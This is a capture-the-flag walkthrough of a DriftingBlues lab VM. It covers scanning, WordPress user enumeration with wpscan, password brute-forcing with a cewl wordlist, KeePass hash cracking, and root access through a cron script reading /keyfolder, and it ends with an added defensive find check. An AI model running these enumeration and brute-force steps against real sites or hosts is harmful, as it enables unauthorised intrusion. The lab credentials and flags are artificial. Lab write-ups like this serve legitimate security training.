Information gathering
Host discovery
arp-scan -l
Port scan
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.254.43
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-29 04:14 EDT
Nmap scan report for 192.168.254.43
Host is up (0.00045s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
MAC Address: 08:00:27:CA:4D:E5 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Directory scan
┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 100 -b 403,404 -x php,txt,jpg,html,txt,zip -u http://192.168.254.43
===============================================================
/wp-content (Status: 301) [Size: 321] [--> http://192.168.254.43/wp-content/]
/index.php (Status: 301) [Size: 0] [--> http://192.168.254.43/]
/wp-login.php (Status: 200) [Size: 6675]
/license.txt (Status: 200) [Size: 19915]
/wp-includes (Status: 301) [Size: 322] [--> http://192.168.254.43/wp-includes/]
/readme.html (Status: 200) [Size: 7278]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-admin (Status: 301) [Size: 319] [--> http://192.168.254.43/wp-admin/]
/xmlrpc.php (Status: 405) [Size: 42]
/wp-signup.php (Status: 302) [Size: 0] [--> http://192.168.254.43/wp-login.php?action=register]
Progress: 1245858 / 1245864 (100.00%)
A login page turned up, and the site is WordPress, so there are two approaches:
- try SQL injection
- run a wpscan vulnerability scan
In the end it was wpscan's user enumeration that paid off.
Getting a shell
WPScan usage guide – 吃不胖的ruanruan – 博客园 (cnblogs.com)
wpscan can enumerate usernames; then cewl is used to build a wordlist from the site and the passwords are brute-forced.
wpscan --url http://192.168.254.43 --enumerate u
[i] User(s) Identified:
[+] abuzerkomurcu
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.254.43/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] gadd
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] gill
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] collins
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] satanic
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
Generate the wordlist
┌──(root㉿kali)-[~/blue5]
└─# cewl -d 2 -m 4 -w passwd --with-numbers http://192.168.254.43/
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Then run the password brute-force against the enumerated usernames; wpscan can do this too:
┌──(root㉿kali)-[~/blue5]
└─# wpscan --url http://192.168.254.43 --usernames user.txt --passwords passwd
[!] Valid Combinations Found:
| Username: gill, Password: interchangeable
Username and password found.
An image was found on the Media page; downloading and analysing it revealed the SSH login password.
Log in directly over SSH and grab user.txt:
ssh gill@ip
gill@driftingblues:~$ cat user.txt
F83FC7429857283616AE62F8B64143E6
Privilege escalation
Next, in gill's home directory there is a key file, keyfile.kdbx; a quick search showed that a dedicated tool is needed to handle it.
keepass2john keyfile.kdbx > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Press 'q' or Ctrl-C to abort, almost any other key for status
porsiempre (keyfile)
keepass2 keyfile.kdbx
Entering the password reveals the key names and their keys.
No clear idea at this point, so fall back on the usual checks one by one:
- sudo -l: not usable
- find / -perm -u=s -type f 2>/dev/null: no exploitable SUID binaries found either
- cron jobs: nothing exploitable
- /usr/sbin/getcap -r 2>/dev/null: nothing exploitable
- find / -writable 2>/dev/null: no writable files
Out of ideas; only after reading a more experienced player's writeup did I realise I had forgotten my old friends linpeas.sh and pspy64, hahaha.
linpeas.sh turned up a suspicious key directory:
╔══════════╣ Unexpected in root
/vmlinuz.old
/initrd.img
/initrd.img.old
/vmlinuz
/keyfolder
pspy64 shows a cron job that runs a key script on a schedule, which is fun, but what the script does is unknown, which is a headache. Following the other writeup, the guess is that a key name has to be written into the key folder, i.e. /keyfolder.
2024/05/29 07:04:49 CMD: UID=0 PID=1 | /sbin/init
2024/05/29 07:05:01 CMD: UID=0 PID=13750 | /usr/sbin/CRON -f
2024/05/29 07:05:01 CMD: UID=0 PID=13751 | /usr/sbin/CRON -f
2024/05/29 07:05:01 CMD: UID=0 PID=13752 | /bin/sh -c /root/key.sh
2024/05/29 07:05:01 CMD: UID=0 PID=13753 | /bin/bash /root/key.sh
2024/05/29 07:05:49 CMD: UID=0 PID=13754 |
2024/05/29 07:06:01 CMD: UID=0 PID=13755 | /usr/sbin/CRON -f
2024/05/29 07:06:01 CMD: UID=0 PID=13756 | /usr/sbin/CRON -f
2024/05/29 07:06:01 CMD: UID=0 PID=13757 | /bin/sh -c /root/key.sh
2024/05/29 07:06:01 CMD: UID=0 PID=13758 | /bin/bash /root/key.sh
From the writeup, the key file name has to be written first, and written one at a time, meaning the names must be tried one by one; writing all of them into /keyfolder at once will not work, and only then does the script succeed.
touch fracturedocean
gill@driftingblues:/keyfolder$ ls -la
total 12
drwx---rwx 2 root root 4096 May 29 08:01 .
drwxr-xr-x 19 root root 4096 Feb 24 2021 ..
-rw-r--r-- 1 gill gill 0 May 29 07:57 fracturedocean
-rw-r--r-- 1 root root 29 May 29 08:01 rootcreds.txt
gill@driftingblues:/keyfolder$ cat rootcreds.txt
root creds
imjustdrifting31
Got root
root@driftingblues:~# cat root.txt
9EFF53317826250071574B4D4EE56840
Now let's look at the key.sh file:
root@driftingblues:~# cat key.sh
#!/bin/bash
if [[ $(ls /keyfolder) == "fracturedocean" ]]; then
    echo "root creds" >> /keyfolder/rootcreds.txt
    echo "" >> /keyfolder/rootcreds.txt
    echo "imjustdrifting31" >> /keyfolder/rootcreds.txt
fi
So if the only entry in /keyfolder is the file fracturedocean, the script writes root's password into rootcreds.txt, i.e. root's credential file. An interesting script; this is the first time I have seen this kind of privilege escalation.
Takeaways
- cewl for information gathering
- using wpscan
- privilege escalation by guessing the contents of a script
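As an added example (not part of the original write-up or the VM), the shell snippet below reproduces the comparison from key.sh in a temporary directory to show why only a lone fracturedocean entry triggers it, and adds a find-based check for the root cause: a world-writable directory without the sticky bit that a root cron job trusts. It uses POSIX [ ] instead of bash [[ ]] and never touches /keyfolder itself.

```shell
# Added example, not the original key.sh: the comparison is the same
# ( $(ls DIR) compared as a whole against one name ), so any second
# entry in the directory makes the check fail.
# matches_only_entry DIR NAME -> success only if `ls DIR` prints exactly NAME
matches_only_entry() {
    [ "$(ls "$1")" = "$2" ]
}

# demo_keyfolder_check: returns 0 when the two-entry case fails and the
# single-entry case succeeds, which is the behaviour the walkthrough observed.
demo_keyfolder_check() {
    tmp=$(mktemp -d) || return 1
    touch "$tmp/fracturedocean" "$tmp/other"
    # Two entries: ls prints "fracturedocean" and "other" on separate lines,
    # so the string comparison against "fracturedocean" fails.
    if matches_only_entry "$tmp" fracturedocean; then rm -rf "$tmp"; return 1; fi
    rm "$tmp/other"
    # Single entry: ls output is exactly the name, the comparison succeeds.
    if ! matches_only_entry "$tmp" fracturedocean; then rm -rf "$tmp"; return 1; fi
    rm -rf "$tmp"
    return 0
}

# Defender check (hypothetical helper): list directories under ROOT that any
# user can write to and that lack the sticky bit. A root cron job that reads
# file names from such a directory is exactly the /keyfolder misconfiguration.
world_writable_dirs() {
    find "$1" -xdev -type d -perm -0002 ! -perm -1000 2>/dev/null
}

# Usage on a live host:  world_writable_dirs /
# Self-check of the key.sh logic:
demo_keyfolder_check && echo "single-entry rule confirmed"
```

Pair the directory listing with the cron and pspy output to find which scheduled root scripts actually read from those directories.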